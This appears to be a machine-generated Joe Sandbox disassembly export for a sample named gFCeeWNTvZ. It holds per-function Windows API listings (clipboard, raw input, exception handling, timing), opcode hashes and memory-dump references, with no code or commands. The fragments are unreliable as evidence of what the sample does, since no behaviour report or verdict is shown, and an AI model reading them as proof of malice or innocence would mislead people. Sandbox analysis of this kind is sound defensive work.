                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ContextCurrent.Makecallocglfwstrcpy
                                                                            • String ID: 3cd
                                                                            • API String ID: 1788468011-159238042
                                                                            • Opcode ID: 2304726388e96dead50c1d61f080e64d457ad7172f610e80862ece414da8d9a7
                                                                            • Instruction ID: 03198bbc303c97b6376e433ddd5c4f80c2fcef52d2c33b9efc15072323d32dc3
                                                                            • Opcode Fuzzy Hash: 2304726388e96dead50c1d61f080e64d457ad7172f610e80862ece414da8d9a7
                                                                            • Instruction Fuzzy Hash: E801F7B17083408FE709AF58C2C039977E1EB55B19F00C46AD9A88F341D77788C19797

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 335 64609b0e-64609b15 336 64609b76 335->336 337 64609b17-64609b52 GetModuleHandleW 335->337 336->336 338 64609b57-64609b5c 337->338 339 64609b72-64609b75 338->339 340 64609b5e-64609b6d call 64602ef4 338->340 339->336 340->339
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,64633B3C,?,64608F89), ref: 64609B2B
                                                                              • Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModulecallocstrcpy
                                                                            • String ID:
                                                                            • API String ID: 201297998-0
                                                                            • Opcode ID: fd2d56a074e933bbdbfcf0366e7dd8147be3146eb1afee0157ecf2b77bf12438
                                                                            • Instruction ID: 45fb95450c7f613d8c139586dc322b620b14055cfca3123252664d532c9aa62d
                                                                            • Opcode Fuzzy Hash: fd2d56a074e933bbdbfcf0366e7dd8147be3146eb1afee0157ecf2b77bf12438
                                                                            • Instruction Fuzzy Hash: F1F034B0508381DBDB06AF26D24978BBBE4EB55B88F00D91CE4D507240D3B5C488CB62
                                                                            APIs
                                                                            • OpenClipboard.USER32 ref: 6460E3DA
                                                                            • GetClipboardData.USER32 ref: 6460E402
                                                                            • CloseClipboard.USER32 ref: 6460E429
                                                                              • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                              • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                              • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$ByteCharCloseDataErrorFormatLastMessageMultiOpenWide
                                                                            • String ID: ?!cd
                                                                            • API String ID: 3814655098-3029108249
                                                                            • Opcode ID: 3e00b10a35443fd6316c3cfce3fa4d2224ac93d0c0fa08c9f8415aeea459148c
                                                                            • Instruction ID: 1e3a5640424b765a1ace3aa08e8c3faaab073590e9099d1ebd5dcc15657c0ed4
                                                                            • Opcode Fuzzy Hash: 3e00b10a35443fd6316c3cfce3fa4d2224ac93d0c0fa08c9f8415aeea459148c
                                                                            • Instruction Fuzzy Hash: F7216DB060C350DBD7167FA9CA8479EBBE8FB56B55F01942CE5C5C3200D7B498848BA7
                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32 ref: 6460E2F4
                                                                            • GlobalLock.KERNEL32 ref: 6460E31E
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6460E392
                                                                              • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                              • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                              • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocByteCharErrorFormatFreeLastLockMessageMultiWide
                                                                            • String ID:
                                                                            • API String ID: 3453243994-0
                                                                            • Opcode ID: 73381ce7e260493f79de8631a67482dc099fa0e6a5317d035ac0943809c6ed9a
                                                                            • Instruction ID: 1af1f2522bf29651f8543d3c7fd93ad5ccf7bd5a95a5199db3afa89fa8dc33f2
                                                                            • Opcode Fuzzy Hash: 73381ce7e260493f79de8631a67482dc099fa0e6a5317d035ac0943809c6ed9a
                                                                            • Instruction Fuzzy Hash: 85416AB0508341EFDB05AF6ACA4839EBFF4FB45761F00C92DE8888B240D3748484CBA2
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: State
                                                                            • String ID:
                                                                            • API String ID: 1649606143-0
                                                                            • Opcode ID: 847e3df588da540dcf1b59635b2408ac9f6daf5b5d297e9ac9d3c2577dec495a
                                                                            • Instruction ID: 864026d1cb7c078cbe1523b34db08e4da42a9e532c9b22f97af7a2e5f9ad4f50
                                                                            • Opcode Fuzzy Hash: 847e3df588da540dcf1b59635b2408ac9f6daf5b5d297e9ac9d3c2577dec495a
                                                                            • Instruction Fuzzy Hash: EC0167B59043595EEB247BDACD447AFBEB8DF41BA4F41842EDAD413241C7B91040DAB2
                                                                            APIs
                                                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 6461056F
                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,646013E5), ref: 64610580
                                                                            • GetCurrentThreadId.KERNEL32 ref: 64610588
                                                                            • GetTickCount.KERNEL32 ref: 64610590
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,646013E5), ref: 6461059F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                            • String ID:
                                                                            • API String ID: 1445889803-0
                                                                            • Opcode ID: a903fcd543008832f528e1bd1313952d38995f44d5e3bb289cbb4e52cc730063
                                                                            • Instruction ID: 4098e1f792661b811c022bcd4256120fdc6bdbc12b5fdcfa95f35455c30f3de0
                                                                            • Opcode Fuzzy Hash: a903fcd543008832f528e1bd1313952d38995f44d5e3bb289cbb4e52cc730063
                                                                            • Instruction Fuzzy Hash: AC11A3B150C3408FDB10EF7AD58854BBBE4FB8A251F00583AE845C7B10EA30D498C782
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 6461063F
                                                                            • UnhandledExceptionFilter.KERNEL32 ref: 6461064F
                                                                            • GetCurrentProcess.KERNEL32 ref: 64610658
                                                                            • TerminateProcess.KERNEL32 ref: 64610669
                                                                            • abort.MSVCRT ref: 64610672
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                            • String ID:
                                                                            • API String ID: 520269711-0
                                                                            • Opcode ID: 8e68a6bfe9dddbc9460aaad5130a9c4fb207ff0a5dea586c87432d2b2070cb2e
                                                                            • Instruction ID: 48baf10372db0d9f919d5919cdc0d0d1cbca1b7c8996cf0b71dbba256961bdc2
                                                                            • Opcode Fuzzy Hash: 8e68a6bfe9dddbc9460aaad5130a9c4fb207ff0a5dea586c87432d2b2070cb2e
                                                                            • Instruction Fuzzy Hash: 201116B5908344CFEB11EF6EC14464ABBF0FB8A305F44952DE88897310E775A954CF92
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 6461063F
                                                                            • UnhandledExceptionFilter.KERNEL32 ref: 6461064F
                                                                            • GetCurrentProcess.KERNEL32 ref: 64610658
                                                                            • TerminateProcess.KERNEL32 ref: 64610669
                                                                            • abort.MSVCRT ref: 64610672
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
                                                                            • String ID:
                                                                            • API String ID: 520269711-0
                                                                            • Opcode ID: fc46e2344d4d6732d3eed0841b46266a61fc02ddebdf8d9c360195002ec89bb4
                                                                            • Instruction ID: 4368150bcebd0d5d296739eab8096d8ee2dcb78995e09cae170670a87d726f28
                                                                            • Opcode Fuzzy Hash: fc46e2344d4d6732d3eed0841b46266a61fc02ddebdf8d9c360195002ec89bb4
                                                                            • Instruction Fuzzy Hash: 841105B5908384CFEB11EF7EC549659BBF0FB4A305F449429E84497300E774A944CF92
                                                                            APIs
                                                                            • GetLastError.KERNEL32 ref: 646082DF
                                                                            • FormatMessageW.KERNEL32 ref: 64608317
                                                                            • WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                              • Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
                                                                              • Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharErrorFormatLastMessageMultiWidecallocstrcpy
                                                                            • String ID:
                                                                            • API String ID: 4215368167-0
                                                                            • Opcode ID: 3a05718e056d70fd0ea33441e74aba6124f330db38033d56e7ba3221e27b8782
                                                                            • Instruction ID: adaf8a1903572cba01a8a3079a11a46211bc0e26c5758607537fd6aa15b1cc0a
                                                                            • Opcode Fuzzy Hash: 3a05718e056d70fd0ea33441e74aba6124f330db38033d56e7ba3221e27b8782
                                                                            • Instruction Fuzzy Hash: AA21D6B1408345DFE750EF69C54879ABBF1FB84314F00896DE5989B290C7B89A89CF82
                                                                            APIs
                                                                            • RegisterRawInputDevices.USER32 ref: 6460BAA3
                                                                              • Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
                                                                              • Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
                                                                              • Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharDevicesErrorFormatInputLastMessageMultiRegisterWide
                                                                            • String ID: @:ad
                                                                            • API String ID: 2565755986-2778011840
                                                                            • Opcode ID: fb5363f0bf1a3cf9aff41d4085d91955f89f4dea58422cea29d870e782d30371
                                                                            • Instruction ID: 08e6777a9edac521f99355513d5423c6298ba1827fe259af2578882fcd771688
                                                                            • Opcode Fuzzy Hash: fb5363f0bf1a3cf9aff41d4085d91955f89f4dea58422cea29d870e782d30371
                                                                            • Instruction Fuzzy Hash: 58E065714082449BDB01EFA9D6047DEBBF8EF81715F408828D98557200DB759A48CB92
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID: Iconic
                                                                            • String ID:
                                                                            • API String ID: 110040809-0
                                                                            • Opcode ID: d72d9febf81ae622c4ab3cc3c13540e0052c0e741e5a9b0b6ecada34421a14a3
                                                                            • Instruction ID: 50faefa21715e4e1c21aa030e48e9c97a0ede8ffee063f6bd876839af5adcc39
                                                                            • Opcode Fuzzy Hash: d72d9febf81ae622c4ab3cc3c13540e0052c0e741e5a9b0b6ecada34421a14a3
                                                                            • Instruction Fuzzy Hash: FEC08C382042049FCB00BF6CC54D8083BF8AF45202F4044A8A8818B302DA70E8008B92
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 59e993f81f42dfd284a4e22e36e2d5c1acba2f4610dc78872d8d20d2a385fc86
                                                                            • Instruction ID: 0e953b33a256018db5a888cb9143b4fe0a4412778393f75f523fc541ee37cc92
                                                                            • Opcode Fuzzy Hash: 59e993f81f42dfd284a4e22e36e2d5c1acba2f4610dc78872d8d20d2a385fc86
                                                                            • Instruction Fuzzy Hash: A8D1319289E7C14FE30387745C69686BFB19F23215B4A49EBC4C1CE4E3E28E4859C767
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4a513d782411bcb8eecdc7498cc1b6286e5d92316dd756024d320aa475a30318
                                                                            • Instruction ID: 0e23f811ea2e0a345acbd449bf87283bbfd55b7525f73250e585e90274cb1556
                                                                            • Opcode Fuzzy Hash: 4a513d782411bcb8eecdc7498cc1b6286e5d92316dd756024d320aa475a30318
                                                                            • Instruction Fuzzy Hash: ADB16BA644E3C19FC7538BB49C756917FB0AE2721074F14DBC480CF5B3E219691AEB22
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3e759ee3e9735cf1be713922323b3552bcd2336ba03015ea5b99d8440e562f46
                                                                            • Instruction ID: d89420e1045f6f9ef6d997c696fe3282d893eda0ee5451854fef3705e2efd654
                                                                            • Opcode Fuzzy Hash: 3e759ee3e9735cf1be713922323b3552bcd2336ba03015ea5b99d8440e562f46
                                                                            • Instruction Fuzzy Hash: FD5168A240E3D05FD7038BB48C66A917FB0AE2720430F55DBC480CF5B3E219A91EE762
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c675e7772fcff83fca46e9263e8b1d89e28d0ffe092a057c297ccc0aea4fcacf
                                                                            • Instruction ID: eed2cc20922439a7e1e3b0eab9e4208ed1b6d87852967f1fd6cae58ffdfcb8f4
                                                                            • Opcode Fuzzy Hash: c675e7772fcff83fca46e9263e8b1d89e28d0ffe092a057c297ccc0aea4fcacf
                                                                            • Instruction Fuzzy Hash: B05165A289E7C14FE7038B345C69296BF719F23211B4E44DBC481CE4E3E19E485ADB27
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 08072c8cb25a6dce1acd63940368b60abdb922b6c1d8b3a3ff1ecb50c00de19e
                                                                            • Instruction ID: c4101f36ba82db2b07d90c2d29504b685a89cc22e1d134cc4dc3356f4ca41f26
                                                                            • Opcode Fuzzy Hash: 08072c8cb25a6dce1acd63940368b60abdb922b6c1d8b3a3ff1ecb50c00de19e
                                                                            • Instruction Fuzzy Hash: 7271649289E7C14FE30387349C686867FB19F63215B4A48EBC4C1CF4A3E18E5859DB67
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000003.1833443656.000000001275E000.00000004.00001000.00020000.00000000.sdmp, Offset: 1275E000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_3_1275e000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 572280731699b7b0fc134c8da2f52282102eabc269467eaccfcd0dcea1eb8475
                                                                            • Instruction ID: 5ff69c4ba6d94e43578e9143d5c19558acdc0b85f2f7387ffe0b6adf7ab0f04a
                                                                            • Opcode Fuzzy Hash: 572280731699b7b0fc134c8da2f52282102eabc269467eaccfcd0dcea1eb8475
                                                                            • Instruction Fuzzy Hash: 59419EA280E3C19FD7138BB48CA16917FF0AE2721074F55DBC480CF5B7E2196919EB62
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1878546702.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true
                                                                            • Associated: 00000000.00000002.1878522586.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878571036.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878595951.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878622870.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878644785.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878669128.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878691339.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1878714811.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_64600000_gFCeeWNTvZ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2245ba16ef808d711bd6a6e045eb0f15c2ca42dc2bb65fd1ebafcf8c82b7c57c
                                                                            • Instruction ID: ca04ee5e1998c071bdabcf0428fcc9233e076c172b21be8776349022a1105c3d
                                                                            • Opcode Fuzzy Hash: 2245ba16ef808d711bd6a6e045eb0f15c2ca42dc2bb65fd1ebafcf8c82b7c57c
                                                                            • Instruction Fuzzy Hash: 9CD09E742013098BFB098F5ACA61B667BA9BF55B11F14C058DC244F741D775E581CB50

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
